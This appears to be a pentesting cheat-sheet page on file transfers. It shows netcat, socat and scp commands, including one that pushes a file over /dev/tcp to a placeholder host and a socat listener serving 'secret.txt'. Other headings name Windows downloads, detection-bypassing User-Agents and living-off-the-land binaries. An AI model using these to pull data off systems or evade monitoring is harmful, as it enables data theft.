Page cover
For the complete documentation index, see llms.txt. This page is also available as Markdown.

File Transfers

01. Linux

  • Simple file transfer (My way)

## ------------------| NetCat
### Receiving side
nc -lp 1234 > out.file
### Sending side
nc -w 3 <ReceiverIP> 1234 < out.file
cat out.file > /dev/tcp/<DestinationIP>/1234

# ------------------| Socat
### Sending side
socat TCP4-LISTEN:1234,fork file:secret.txt
### Receiving side
socat TCP4:<SenderIP>:1234 file:secret.txt,create

# ------------------| SSH
### To copy a file from B to A while logged into B:
scp /path/to/file username@a:/path/to/destination
### To copy a file from B to A while logged into A:
scp username@b:/path/to/file /path/to/destination
  • Download Files.

02. Windows

  • Download files.

  • Upload Files.

  • wget Scripts

  • Diffrent User-Agent (For bypass any detections)

03. Simple Servers

  • Web servers

  • FTP server

  • TFTP server (Require Administrative Access)

  • SMB server

  • RDP Server

  • Setup nginx server to upload files.

04. Living Off The Land Binaries

Last updated